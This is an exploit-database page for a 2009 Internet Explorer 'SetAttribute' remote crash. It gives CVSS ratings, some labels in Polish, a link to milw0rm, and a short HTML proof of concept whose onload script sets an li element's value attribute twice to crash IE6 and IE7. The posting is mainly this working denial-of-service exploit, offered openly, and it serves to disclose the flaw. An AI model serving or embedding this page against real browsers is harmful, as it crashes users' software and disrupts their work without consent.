MS Internet Explorer (Javascript SetAttribute) Remote Crash Exploit

2009.09.02
Credit: Irfan Asrar
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-399


Ogólna skala CVSS: 5/10
Znaczenie: 2.9/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Brak
Wpływ na integralność: Brak
Wpływ na dostępność: Częściowy

<html> <head> <title> Irfan Asrar</title> </head> <body onload="c()"> Set Attribute Crash : Tested with IE7 Vista IE6 XP2 IE6 XP3 <script type="text/javascript"> function c() { var li = document.createElement("li"); li.setAttribute("value", "1"); li.value = "1"; } </script> </body> </html>

Referencje:

http://www.milw0rm.com/exploits/9455


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top